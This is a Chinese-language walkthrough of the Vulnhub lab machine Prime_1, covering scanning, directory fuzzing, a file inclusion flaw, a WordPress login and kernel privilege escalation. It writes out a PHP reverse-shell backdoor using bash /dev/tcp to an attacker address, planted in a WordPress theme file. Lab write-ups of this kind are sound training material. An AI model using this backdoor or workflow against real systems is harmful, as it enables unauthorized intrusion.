Vulnhub靶机:PRIME_ 1

有目标就不怕路远。年轻人.无论你现在身在何方.重要的是你将要向何处去。只有明确的目标才能助你成功。没有目标的航船.任何方向的风对他来说都是逆风。因此,再遥远的旅程,只要有目标.就不怕路远。没有目标,哪来的劲头?一车尔尼雷夫斯基

导读:本篇文章讲解 Vulnhub靶机:PRIME_ 1,希望对大家有帮助,欢迎收藏,转发!站点地址:www.bmabk.com,来源:原文

介绍

系列:Prime(此系列共1台)
发布日期:2019年9月1日
难度:初-中
运行环境:VMware Workstation
目标:取得 root 权限 + Flag
学习:

  • 主机发现
  • 端口扫描+漏洞扫描
  • 目录爆破
  • 文件扩展名爆破
  • 强制访问
  • 文件包含漏洞
  • WordPress利用
  • 内核提权

靶机地址:https://www.vulnhub.com/entry/prime-1,358/

信息收集

主机信息探测

netdiscover主机发现

sudo netdiscover -i eth0 -r 192.168.229.0/24

主机信息探测

发现网站存在wordpress,并且似乎存在漏洞

nmap -p- 192.168.229.136
nmap -p 22,80 -A 192.168.229.136
nmap -p 22,80 --script=vuln 192.168.229.136

在这里插入图片描述

网站探测

开局就是一个静态页面,页面源代码中没有任何有价值的信息,直接目录爆破
在这里插入图片描述

目录爆破

dirsearch -u http://192.168.229.136/ --full-url -R 2 -x 404

在这里插入图片描述

首先,“dev”目录下提示,我需要更努力的爆破才行,针对WordPress的用户名枚举只发现了“victor”,漏洞枚举没有发现能打进去的漏洞。
进行二次目录爆破,这次对文件扩展进行爆破,结果就是没有发现什么有价值的信息

dirsearch -u http://192.168.229.136/ --full-url -R 2 -x 404,403 -e php,txt

在这里插入图片描述

排雷dirsearch

到这里卡了一会,看了下别人的扫描方式,不由得感叹,碰上了dirsearch的一个暗坑。我在自己的物理机中,执行与上图同样的命令,结果发现了“secret.txt”。

python D:\tools\目录扫描\dirsearch-0.4.3\dirsearch.py --full-url -R 2 -x 404,403 -u http://192.168.229.136/ -f -e php,txt

在这里插入图片描述

那为什么使用同样的命令,在kali中,dirsearch没有发现这个结果呢?
首先,我的物理机上安装了dirsearch,我知道它字典的路径,借此我在kali中定位到了它的字典,确认存在“secret”目录。那就是说明字典没问题。然后要分析这个问题就需要做流量分析,我让dirsearch的流量全部经过我物理机上的bp

dirsearch -u http://192.168.229.136/ --full-url -R 2 -x 404,403 -e php,txt --proxy=http://192.168.229.1:8080

在这里插入图片描述

过滤bp的流量,发现kali中的dirsearch压根没有访问“secret.txt”
在这里插入图片描述

到此基本确认了dirsearch的这个暗坑,我们常说要交叉不同的工具去测试目标,那么,换用别的工具再来测试一下呢?我这里让ffuf调用dirsearch的默认字典来扫描,顺利发现了目标

ffuf -u http://192.168.229.136/FUZZ -w /usr/lib/python3/dist-packages/dirsearch/db/dicc.txt -c -ic -r -e .txt,.php -fc 403,404

那么这个目录里是个什么东西呢?他告诉我们,要对每个php页面做进一步的模糊测试,并且提供了一个uri作为案例,但是我不需要。说白了,就是对得到的php页面做强制访问,强制访问的参数值是“location.txt”
在这里插入图片描述

强制访问

得到提示,对php页面用“secrettier360”作为参数会得到一些有趣的结果

ffuf -u http://192.168.229.136/index.php?FUZZ=location.txt -w /usr/share/wordlists/SecLists-2022.4/Discovery/Web-Content/common.txt -c -fs 136 -s

在这里插入图片描述

然后就发现了一个看似有趣的页面,它可以把其他页面的内容包含进来,这似乎是一个文件包含漏洞
在这里插入图片描述

在这里插入图片描述

文件包含漏洞

确认文件包含漏洞,并发现一条敏感信息
在这里插入图片描述

兜兜转转,最后得到这样一个结果:follow_the_ippsec
在这里插入图片描述

测试了一下,无法ssh登录

利用WordPress

枚举用户,发现用户:victor

wpscan --url http://192.168.229.136/wordpress/ -e u

尝试登录,于是密码: follow_the_ippsec 可以登录。简单搜寻一番后,发现了一处可以编辑的php页面

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.229.128/1234 0>&1'"); ?>

在这里插入图片描述

后门写上去了,怎么找到这个页面呢?如果你对wordpress不熟悉,可以这样:
首先使用dirb http://192.168.229.136/wordpress/去递归爆破站点,然后你会看到下图红框中的,wordpress的主题路径,然后根据后门坐在的页面,得出后门地址
在这里插入图片描述

顺利的话,你会拿到一个shell
在这里插入图片描述

提权

wordpress配置文件

针对wordpress提权,首先找一找配置文件,在配置文件中找到了一个密码,想要试着提权,失败了。
在这里插入图片描述

在这里插入图片描述

内核提权

发现靶机的内核版本是16.04,应该可以内核漏洞提权,之前打靶碰到过这个内核版本的靶机,直接抄以前的笔记,测试发现靶机有gcc和nc,既然在kali上编译好的文件不能用,那就在靶机上编译文件吧
在这里插入图片描述

在这里插入图片描述

投递原始的利用文件,在靶机上编译之后利用成功
在这里插入图片描述

在这里插入图片描述

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/134204.html

(0)
飞熊的头像飞熊bm

相关推荐

发表回复

登录后才能评论
极客之音——专业性很强的中文编程技术网站,欢迎收藏到浏览器,订阅我们!